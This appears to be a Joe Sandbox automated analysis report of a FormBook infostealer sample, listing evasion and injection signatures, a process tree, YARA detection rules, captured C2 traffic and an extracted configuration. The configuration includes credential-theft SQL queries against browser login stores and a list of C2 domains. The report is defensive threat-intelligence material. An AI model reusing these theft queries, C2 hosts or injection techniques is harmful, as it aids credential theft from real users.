Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report GRACE.exe

Overview

General Information

Sample Name:GRACE.exe
Analysis ID:344817
MD5:9034acbb2742281523525d715a4ee566
SHA1:605948c4bcd7a0290e46a37d841a09ab43fbec86
SHA256:cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
Tags:COVID-19Formbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • GRACE.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\GRACE.exe' MD5: 9034ACBB2742281523525D715A4EE566)
    • AddInProcess32.exe (PID: 6508 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 404 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 2436 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        10.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 10.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: GRACE.exeVirustotal: Detection: 62%Perma Link
          Source: GRACE.exeMetadefender: Detection: 16%Perma Link
          Source: GRACE.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: GRACE.exeJoe Sandbox ML: detected
          Source: 10.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: GRACE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: GRACE.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
          Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then jmp 06CE2656h
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov esp, ebp
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi
          Source: global trafficHTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1Host: www.dl888.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1Host: www.dl888.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.dl888.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1308Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Wed, 27 Jan 2021 06:58:37 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 